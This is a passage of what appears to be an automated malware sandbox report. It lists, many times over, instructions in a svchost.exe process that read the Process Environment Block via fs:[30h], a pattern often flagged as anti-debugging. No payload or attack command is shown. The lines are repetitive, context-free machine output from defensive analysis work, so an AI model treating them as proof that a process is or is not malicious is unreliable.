            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]2_2_03104B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]2_2_03028B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
